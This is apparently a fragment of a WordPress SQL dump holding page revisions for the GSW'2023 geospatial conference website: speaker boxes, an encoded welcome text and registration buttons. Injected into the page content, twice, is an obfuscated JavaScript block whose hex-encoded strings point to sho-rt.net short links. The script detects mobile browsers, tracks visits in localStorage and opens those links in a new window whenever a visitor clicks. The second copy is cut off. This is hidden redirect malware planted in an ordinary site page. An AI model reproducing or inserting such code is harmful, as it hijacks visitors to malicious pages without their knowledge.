US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665273002466{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3056C9), color-stop(54%, #3959CC), color-stop(95%, #483DEB));background: -moz-linear-gradient(left,#3056C9 10%,#3959CC 54%,#483DEB 95%);background: -webkit-linear-gradient(left,#3056C9 10%,#3959CC 54%,#483DEB 95%);background: -o-linear-gradient(left,#3056C9 10%,#3959CC 54%,#483DEB 95%);background: -ms-linear-gradient(left,#3056C9 10%,#3959CC 54%,#483DEB 95%);background: linear-gradient(left,#3056C9 10%,#3959CC 54%,#483DEB 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-08 23:51:10','2022-10-08 23:51:10','',2167,'https://gsw2023.com/?p=2623',0,'revision','',0),
(2624,1,'2022-10-08 23:58:46','2022-10-08 23:58:46','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182820572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665273458447{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #DDDEB4), color-stop(95%, #E9EBCE));background: -moz-linear-gradient(left,#DDDEB4 10%,#E9EBCE 95%);background: -webkit-linear-gradient(left,#DDDEB4 10%,#E9EBCE 95%);background: -o-linear-gradient(left,#DDDEB4 10%,#E9EBCE 95%);background: -ms-linear-gradient(left,#DDDEB4 10%,#E9EBCE 95%);background: linear-gradient(left,#DDDEB4 10%,#E9EBCE 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'